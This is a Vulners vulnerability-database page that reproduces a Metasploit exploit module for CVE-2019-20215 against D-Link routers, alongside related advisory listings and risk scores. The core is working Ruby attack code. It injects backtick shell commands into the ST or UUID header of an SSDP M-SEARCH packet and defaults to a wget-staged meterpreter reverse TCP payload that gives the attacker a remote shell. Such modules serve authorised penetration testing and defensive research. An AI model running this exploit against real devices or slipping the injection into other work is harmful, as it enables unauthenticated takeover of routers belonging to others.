Vulners
Lucene search
D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi Exploit | 10 Feb 202000:00 | – | zdt |
 | Exploit for Deserialization of Untrusted Data in Redhat Jboss_Enterprise_Application_Platform | 8 Dec 202020:38 | – | gitee |
 | CVE-2019-20215 | 29 May 201815:50 | – | circl |
 | D-Link DIR-859 ssdpcgi() M-SEARCH arbitrary command execution vulnerability (CNVD-2020-13689) | 4 Feb 202000:00 | – | cnvd |
 | D-Link DIR-859 Remote Code Execution (CVE-2019-20215) | 21 May 202000:00 | – | checkpoint_advisories |
 | CVE-2019-20215 | 29 Jan 202002:23 | – | cve |
 | CVE-2019-20215 | 29 Jan 202002:23 | – | cvelist |
 | DLink DIR-859 1.05 & 1.06B01 Multiple Vulnerabilities (RCE) | 22 Dec 202300:00 | – | nessus |
 | D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi | 28 Jan 202019:15 | – | metasploit |
| D-Link Unauthenticated Remote Command Execution using UPnP via a special crafted M-SEARCH packet. | 11 Jul 201414:17 | – | metasploit |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Udp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',
'Description' => %q{
D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.
},
'Author' =>
[
's1kr10s',
'secenv'
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-20215'],
['URL', 'https://medium.com/@s1kr10s/2e799acb8a73']
],
'DisclosureDate' => 'Dec 24 2019',
'Privileged' => true,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
'CMDSTAGER::FLAVOR' => 'wget',
'RPORT' => '1900'
},
'Targets' =>
[
[ 'Auto', { } ],
],
'CmdStagerFlavor' => %w{ echo wget },
'DefaultTarget' => 0
))
register_options(
[
Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
])
end
def exploit
execute_cmdstager(linemax: 1500)
end
def execute_command(cmd, opts)
type = datastore['VECTOR']
if type == "URN"
print_status("Target Payload URN")
val = "urn:device:1;`#{cmd}`"
else
print_status("Target Payload UUID")
val = "uuid:`#{cmd}`"
end
connect_udp
header = "M-SEARCH * HTTP/1.1\r\n"
header << "Host:239.255.255.250: " + datastore['RPORT'].to_s + "\r\n"
header << "ST:#{val}\r\n"
header << "Man:\"ssdp:discover\"\r\n"
header << "MX:2\r\n\r\n"
udp_sock.put(header)
disconnect_udp
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Feb 2020 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
CVSS 210
EPSS0.90327